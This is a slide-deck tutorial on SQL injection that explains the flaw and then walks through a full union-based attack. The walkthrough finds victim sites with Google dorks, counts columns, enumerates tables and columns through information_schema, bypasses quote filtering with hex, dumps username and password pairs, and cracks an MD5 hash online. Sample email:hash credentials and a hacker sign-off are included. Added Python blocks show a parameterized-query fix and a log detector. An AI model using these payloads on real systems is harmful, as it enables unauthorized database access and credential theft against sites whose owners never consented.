SQLi

SQL injection is a code injection technique used to attack data-driven applications by inserting malicious SQL statements into an entry field for execution by the backend database. It can be used to extract data from the database or manipulate it in unauthorized ways. The information_schema database in MySQL version 5 and above provides metadata about database structure that can help identify vulnerable tables and columns during an SQL injection attack. Group_concat() is a function that concatenates column values into a single string, useful for extracting multiple values like all table or column names.

Uploaded by dawasov843

SQL Injection

What is SQL?
• Structured Query Language (SQL) is basically a
textual language that enables interaction with a
database server.
• SQL commands such as SELECT, INSERT,
RETRIEVE, UPDATE, ALTER, DELETE, DROP
are used to perform operations on the database.
• Programmers use these commands to
manipulate data in the database server.
What is SQL Injection?
• SQL Injection is the most common vulnerability on
the Internet.
• It is a flaw in Web Applications and not a
Database or Web server issue.
• Most programmers are still not aware of this
threat.
• SQL Injection is a basic attack used to either
gain unauthorized access to a database or to
retrieve information directly from the database.
What is SQL Injection?
• SQL Injection is defined as a technique that
takes advantage of non-validated input
vulnerabilities and injects SQL commands.
• Programmers use sequential SQL commands
with client supplied parameters making it easier
for attackers to inject commands.
• Attackers can easily execute random SQL
queries on the database server through a web
application.
How does a Web Application work?
SQL Injection Attacks
• Based on the application and how it processes
user-supplied data, SQL Injection can be used
to perform the following types of attacks.

• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Code Execution
• Authentication Bypass:
Using this attack, an attacker logs on to an
application without providing valid username and
password and gains administrative privileges.
• Information Disclosure:
Using this attack, an attacker obtains
sensitive information that is stored in the
database.
• Compromised Data Integrity:
An attacker uses this attack to deface a web
page, insert malicious content into web pages, or
alter the contents of a database.
• Compromised Availability of Data:
Attackers use this attack to delete the
database information, delete log, or audit
information that is contained in a database.
• Remote Code Execution:
It allows an attacker to compromise the host
operating system.
Server Side Technologies
• Powerful server-side technologies like ASP.NET
and database servers allow developers to
create dynamic, data-driven Websites with
incredible ease.
• The power of ASP.NET and SQL can easily be
exploited by hackers using SQL Injection
attacks.
• All relational databases (SQL Server, Oracle,
IBM DB2 and MySQL) are susceptible to SQL
Injection attacks.
SQL Database Tables
• A relational database contains one or more
tables, each identified by a name.
• Tables contain records (rows) with data.
• For example, the following table is called "users"
and contains data distributed in rows and
columns:

User ID   User Name   Password
-------   ---------   --------
1         Smith       123
2         John        Abc
SQL Queries
• Using the previous table, a query like this:
  SELECT User Name FROM users WHERE User ID = 1;
• Gives a result set like this:
  User Name
  Smith
• SELECT Password FROM users WHERE User ID = 2;
• Gives the result:
  Password
  Abc
SQL Injection Characters
• ' or "        string indicators
• -- or #       single-line comment
• /*…*/         multiple-line comment
• +             addition, concatenate (or space in URL)
• ||            (double pipe) concatenate
• %             wildcard attribute indicator
• PRINT         useful as non-transactional command
• @variable     local variable
• @@variable    global variable
The power of ' (single quote):
• It closes the string parameter.
• Everything after is considered part of the SQL
command.
How does SQL Injection work?
• SQL injection works because programmers
don't properly escape SQL queries that use
data submitted by an untrusted source.
• The most common place for this vulnerability to
be exploited is on dynamic web forms.
• If a user submits text that has correctly
formatted SQL code in it and the server-side
software does not prevent that SQL code from
being run by the database during the database
query, the user has successfully injected SQL
into the database query.
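As an added example (not part of the original slides), the flaw just described beside the two fixes the conclusion calls for, using Python's sqlite3 with a constructed in-memory copy of the slides' "users" table; the function names and the table are assumptions of this example:

```python
import sqlite3

# Constructed in-memory copy of the slides' "users" table (assumption of this example).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Smith", "123"), (2, "John", "Abc")])
    return db

def lookup_vulnerable(db, raw_id):
    # The flaw the slide describes: the request parameter is pasted into the SQL text,
    # so a quote or a comment sequence inside it is executed as part of the command.
    sql = "SELECT user_name FROM users WHERE user_id = " + raw_id
    return [row[0] for row in db.execute(sql)]

def db_error_text(db, raw_id):
    # The database error a vulnerable page leaks for a malformed id (the signal the
    # slide "Test if a website is vulnerable" looks for); None when the query ran cleanly.
    try:
        lookup_vulnerable(db, raw_id)
        return None
    except sqlite3.Error as exc:
        return str(exc)

def lookup_parameterized(db, raw_id):
    # Fix 1: a bound parameter. The value travels separately from the SQL text, so it
    # is compared as data and can never close the statement or append clauses.
    rows = db.execute("SELECT user_name FROM users WHERE user_id = ?", (raw_id,))
    return [row[0] for row in rows]

def lookup_validated(db, raw_id):
    # Fix 2, the "correct input validation" of the conclusion: an id must be a plain
    # integer, so anything containing quotes, spaces or keywords is rejected up front.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(db, int(raw_id))
```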
Vulnerable Applications
• Almost all SQL databases and programming
languages are potentially vulnerable:
– MS SQL Server, Oracle, MySQL, DB2,
– MS Access, Sybase, Informix, etc.

• Accessed through applications developed using:
– Perl and CGI scripts that access a database.
– ASP, JSP, PHP
– XML, XSL and XSQL
– JavaScript
Finding vulnerable sites:
• Open the Google home page and try the following
examples (these can be edited to whatever you
like):
• inurl:php?id=
• inurl:asp?id= OR
• inurl:php?id= site:co.in (for domain-specific sites)
• There are many more types of sites that are
vulnerable to SQL injection; we will be working
with these few for now.
Test if a website is vulnerable:
• So we have a list of sites; let's try to test them
to see if they may be vulnerable to injection.
• We do this by adding a ' (single quote) character
to the end of the URL and seeing if we get any
form of error message.
• Example: www.site.com/index.php?id=1234'
• Error messages will vary, from an on-screen
message to the page simply going blank.
How many Columns?
• So now we have found a site that throws up
errors, we will try to identify how many columns
are on the site.
• We do this by using the ORDER BY command.
• www.site.com/index.php?id=1234 order by 1--
• You keep increasing the number 1, looking for
the number of columns present on the website.
• Say the site has 6 columns: we increase the
number from 1 upwards, and at 7 we would
usually get an error or a blank page.
• www.site.com/index.php?id=1234 order by 2--
• …
• www.site.com/index.php?id=1234 order by 6--
• The page still displays the same with no changes,
so I increase to 7
• www.site.com/index.php?id=1234 order by 7--
• Now I get an error message that says
• Unknown column '7' in 'order clause'
• So it's clear that the site contains 6 columns.
Vulnerable columns
• So we have identified the number of columns;
now we will use the UNION SELECT ALL
command to identify vulnerable columns.
• In the following command you will need to
replace the numbers with the number of columns
you have found on the site.
• www.site.com/index.php?id=1234 union select
1,2,3,4,5,6--
• This will display the number of the vulnerable
column on your screen.
• Number 3 is displayed on the website; this
means that column number 3 is vulnerable.
Check what version and database are running:
• There are 2 methods to check the version() and
database() running on the server.
• Just replace the vulnerable column number with
version() or database().
• Vulnerable column is number 3.
• www.site.com/index.php?id=1234 union select
1,2,version(),4,5,6--
• www.site.com/index.php?id=1234 union select
1,2,database(),4,5,6--
• www.site.com/index.php?id=1234 union select
1,2,user(),4,5,6--
Differences between SQL server v4.0 and v5.0

Version 4.0:
1) In SQL version 4 there is no information_schema.
This means that the table names must be guessed:
   Users
   Admin
   Members
2) Then there are the column names for the table,
which often contain common names; here are a few:
   Username
   Password
   Email
3) With many more possibilities, so as you can see
SQL version 4 can be a huge guessing game.

Version 5.0:
1) SQL version 5 is much easier to do as it has the
information schema to work with.
2) Information schema lets you see what databases,
tables and columns are held in the SQL server.
What is information_schema?
• In MySQL version 5.02 and above there is an
additional database called information_schema.
• This database provides access to the database
metadata.
• This includes the name of a database or a table, the
data type of a column, access privileges, etc.
• information_schema is the information database
where the information about all the other databases
is kept.
• The MySQL server automatically populates the
tables in the information_schema.
• The important thing to remember about the
information_schema database is that you can query
it, but you cannot change its structure or modify its
data.
• Information_schema.tables:
• The INFORMATION_SCHEMA.TABLES allows
you to get information about all tables and views
within a database.
• By default it will show you the information for every
single table and view that is in the database.

• Information_schema.columns:
• The INFORMATION_SCHEMA.COLUMNS view
allows you to get information about all columns for
all tables and views within a database.
• By default it will show you this information for
every single table and view that is in the database.
What is group_concat()?
• The GROUP_CONCAT() function is used to
concatenate all the values into a single string.
• Concatenate, or concat(), means linking all the
group values into a single string.
• group_concat(): this function returns a string
result with the concatenated non-NULL values
from a group.
Finding Table names:
• www.site.com/index.php?id=1234 union select
1,2,group_concat(table_name),4,5,6 from
information_schema.tables where
table_schema=database()--
• It returns all the table names present in the
database.
• As you can see some interesting table names
like
• Admin
• Users
• Members
Finding Column names:
• The next step will be viewing the columns that
reside in the table we choose.
• In this case I will choose 'users', but you could
choose any table you want.
• The command used to view columns inside the
tables is usually
• www.site.com/index.php?id=1234 union select
1,2,group_concat(column_name),4,5,6 from
information_schema.columns where
table_name='users'--
• If there is an error, it means single quotes must be
bypassed.
• So we should encode the string table name
users into hex format.
• You can use this website to convert a string into
hexadecimal:
http://www.string-functions.com/string-hex.aspx
• In programming languages, a hexadecimal
number is usually prefixed with '0x' to make
the compiler aware that you are using
hexadecimal.
• www.site.com/index.php?id=1234 union select
1,2,group_concat(column_name),4,5,6 from
information_schema.columns where table_name
=0x7573657273--
• The hex code of 'users' is 7573657273
Finding Username and Password:
• The previous query returns all the column names
present in the table 'users'.
• Now all we have left to do is to view the data
inside the columns; in this case, select some
interesting column names like username and
password.
• www.site.com/index.php?id=1234 union select
1,2,group_concat(username,0x3a,password),4,5
,6 from users--
• 0x3a is just the separator placed between the
username and the password.
• That's it: you have the list of usernames and
passwords.
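As an added defender-side example (not part of the original slides), a small detector that looks for the request patterns of the walkthrough above (stray quote, order by counting, union select, information_schema, hex literals, group_concat) in constructed web-server access-log lines; the log lines, rule names and threshold are assumptions of this example:

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access log (common log format); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1234 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?id=1234' HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?id=1234%20order%20by%207-- HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?id=1234%20union%20select%201,2,group_concat(table_name),4,5,6%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 6400
10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /index.php?id=1234%20union%20select%201,2,group_concat(column_name),4,5,6%20from%20information_schema.columns%20where%20table_name=0x7573657273-- HTTP/1.1" 200 6410
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /about.php HTTP/1.1" 200 2048
"""

# Rules keyed to the steps of the walkthrough; each regex runs on the URL-decoded,
# lower-cased query string so that %20 and mixed case cannot hide the pattern.
RULES = [
    ("stray_quote_probe",  re.compile(r"=\d+'\s*$")),                        # id=1234'
    ("order_by_enum",      re.compile(r"\border\s+by\s+\d+\s*(--|#)")),       # column counting
    ("union_select",       re.compile(r"\bunion\s+(all\s+)?select\b")),       # column/data pull
    ("information_schema", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("hex_literal",        re.compile(r"\b0x[0-9a-f]{4,}\b")),                # quote bypass
    ("group_concat",       re.compile(r"\bgroup_concat\s*\(")),
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan_log(text):
    """Return (client_ip, http_status, [rule names]) for each request that hits a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        query = unquote_plus(path.split("?", 1)[1]).lower() if "?" in path else ""
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((ip, int(status), matched))
    return hits

def suspicious_clients(hits, min_rules=2):
    """IPs that tripped at least min_rules distinct rules across all their requests."""
    seen = {}
    for ip, _status, names in hits:
        seen.setdefault(ip, set()).update(names)
    return sorted(ip for ip, names in seen.items() if len(names) >= min_rules)
```

A single stray-quote hit can be a typo, so the client-level count is what should page someone; the 500 status next to the probe lines is the error leak the slides rely on and is worth a rule of its own in a real deployment.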
Password Decryption:
Usually when you retrieve the passwords from an
SQL database they will be encrypted, usually in MD5,
SHA1 or MySQL encryption.
Here are a few passwords that have been taken from
a table called users, from the columns email and
password.
steve@abc:10f91c20b4c3585667c1259a4356bf26
elliott@xyz:a54499cd4a6b5735339a491f394da8a1
The MD5 hash part is
10f91c20b4c3585667c1259a4356bf26
The password has been decrypted by using this
website: http://md5decrypter.co.uk/
And the password is inondation
Conclusion
• SQL Injection is a fascinating and dangerous
vulnerability.
• All programming languages and all SQL
databases are potentially vulnerable.
• Protecting against it requires:
– strong design.
– correct input validation.
7#4/\/|< y0U